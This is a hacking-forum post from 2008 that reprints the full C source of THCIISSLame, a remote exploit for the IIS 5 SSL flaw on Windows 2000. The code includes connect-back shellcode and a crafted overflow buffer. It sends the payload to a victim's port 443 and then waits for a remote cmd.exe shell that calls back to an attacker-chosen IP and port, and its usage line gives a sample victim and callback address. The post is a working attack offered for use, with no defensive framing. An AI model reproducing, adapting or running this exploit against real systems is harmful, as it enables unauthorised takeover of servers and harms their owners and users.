hacked MASTER
Mesaj Sayısı : 199 Kayıt tarihi : 08/03/08
| Konu: Microsoft IIS 5 SSL exploit Ptsi Mart 10, 2008 11:50 pm | |
| PHP- Kodu: /************************************************** ***************************/ /* THCIISSLame 0.3 - IIS 5 SSL remote root exploit */ /* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org) */ /* THC PUBLIC SOURCE MATERIALS */ /* */ /* Bug was found by Internet Security Systems */ /* Reversing credits of the bug go to Halvar Flake */ /* */ /* compile with MS Visual C++ : cl THCIISSLame.c */ /* */ /* v0.3 - removed sleep[500]; and fixed the problem with zero ips/ports */ /* v0.2 - This little update uses a connectback shell ! */ /* v0.1 - First release with portbinding shell on 31337 */ /* */ /* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, */ /* scut, stealth, FtR and Random */ /************************************************** ***************************/
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define jumper "\xeb\x0f" #define greetings_to_microsoft "\x54\x48\x43\x4f\x57\x4e\x5a\x49\x49\x53\x21"
char sslshit[] = "\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\ x8f\ x82\x01\x00\x00\x00";
char shellcode[] = "\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\ x59\ x6c\x59\xf8" "\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\ x57\ x53\x32\x5f" "\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\ xff\ xff\xff\x5d" "\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\ x0c\ x8b\x70\x1c" "\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\ x8b\ x5b\x78\x01" "\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\ x53\ x51\x52\x8b" "\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\ x34\ x8b\x01\xfe" "\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\ x45\ x09\x8d\x44" "\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\ x58\ x5e\x56\x50" "\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\ x88\ x01\xf8\x0f" "\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\ xbe\ xfe\x4d\x08" "\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\ x89\ xc7\x6a\x02" "\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x50\ x8b\ x45\x04\x35" "\x93\x93\x93\x93\x89\x45\x04\x66\x8b\x45\x02\ x66\ x35\x93\x93" "\x66\x89\x45\x02\x58\x89\xce\x31\xdb\x53\x53\ x53\ x53\x56\x46" "\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30\x6a\ x10\ x55\x57\xff" "\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55\x55\ xff\ x55\xec\x8d" "\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65\x68\ x5c\ x63\x6d\x64" "\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53\ x53\ xfe\xca\x01" "\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\ xb1\ x08\x53\x53" "\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\ xf0\ x6a\xff\xff" "\x55\xe4";
void usage(); void shell(int sock);
int main(int argc, char *argv[]) { unsigned int i,sock,sock2,sock3,addr,rc,len=16; unsigned char *badbuf,*p; unsigned long offset = 0x6741a1cd; unsigned long XOR = 0xffffffff; unsigned long XORIP = 0x93939393; unsigned short XORPORT = 0x9393;
unsigned short cbport; unsigned long cbip;
struct sockaddr_in mytcp; struct hostent * hp; WSADATA wsaData;
printf("\nTHCIISSLame v0.3 - IIS 5.0 SSL remote root exploit\n"); printf("tested on Windows 2000 Server german/english SP4\n"); printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");
if(argc<4 || argc>4) usage();
badbuf = malloc(352); memset(badbuf,0,352);
printf("\n[*] building buffer\n");
p = badbuf;
memcpy(p,sslshit,sizeof(sslshit));
p+=sizeof(sslshit)-1;
strcat(p,jumper);
strcat(p,greetings_to_microsoft);
offset^=XOR; strncat(p,(unsigned char *)&offset,4);
cbport = htons((unsigned short)atoi(argv[3])); cbip = inet_addr(argv[2]); cbport ^= XORPORT; cbip ^= XORIP; memcpy(&shellcode[2],&cbport,2); memcpy(&shellcode[4],&cbip,4);
strcat(p,shellcode);
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0) { printf("WSAStartup failed !\n"); exit(-1); }
hp = gethostbyname(argv[1]);
if (!hp){ addr = inet_addr(argv[1]); } if ((!hp) && (addr == INADDR_NONE) ) { printf("Unable to resolve %s\n",argv[1]); exit(-1); }
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if (!sock) { printf("socket() error...\n"); exit(-1); }
if (hp != NULL) memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length); else mytcp.sin_addr.s_addr = addr;
if (hp) mytcp.sin_family = hp->h_addrtype; else mytcp.sin_family = AF_INET;
mytcp.sin_port=htons(443);
printf("[*] connecting the target\n");
rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in)); if(rc==0) { send(sock,badbuf,351,0); printf("[*] exploit send\n");
mytcp.sin_addr.s_addr = 0; mytcp.sin_port=htons((unsigned short)atoi(argv[3]));
sock2=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
rc=bind(sock2,(struct sockaddr *)&mytcp,16); if(rc!=0) { printf("bind error() %d\n",WSAGetLastError()); exit(-1); }
rc=listen(sock2,1); if(rc!=0) { printf("listen error()\n"); exit(-1); }
printf("[*] waiting for shell\n"); sock3 = accept(sock2, (struct sockaddr*)&mytcp,&len); if(sock3) { printf("[*] Exploit successful ! Have fun !\n"); printf("[*] --------------------------------------------------------------------\n\n"); shell(sock3); } } else { printf("\nCan't connect to ssl port 443!\n"); exit(-1); }
shutdown(sock,1); closesocket(sock); shutdown(sock,2); closesocket(sock2); shutdown(sock,3); closesocket(sock3);
free(badbuf);
exit(0); }
void usage() { unsigned int a; printf("\nUsage: <victim-host> <connectback-ip> <connectback port>\n"); printf("Sample: THCIISSLame www.lameiss.com 31.33.7.23 31337\n\n"); exit(0); }
void shell(int sock) { int l; char buf[1024]; struct timeval time; unsigned long ul[2];
time.tv_sec = 1; time.tv_usec = 0;
while (1) { ul[0] = 1; ul[1] = sock;
l = select (0, (fd_set *)&ul, NULL, NULL, &time); if(l == 1) { l = recv (sock, buf, sizeof (buf), 0); if (l <= 0) { printf ("bye bye...\n"); return; } l = write (1, buf, l); if (l <= 0) { printf ("bye bye...\n"); return; } } else { l = read (0, buf, sizeof (buf)); if (l <= 0) { printf("bye bye...\n"); return; } l = send(sock, buf, l, 0); if (l <= 0) { printf("bye bye...\n"); return; } } } } | |
|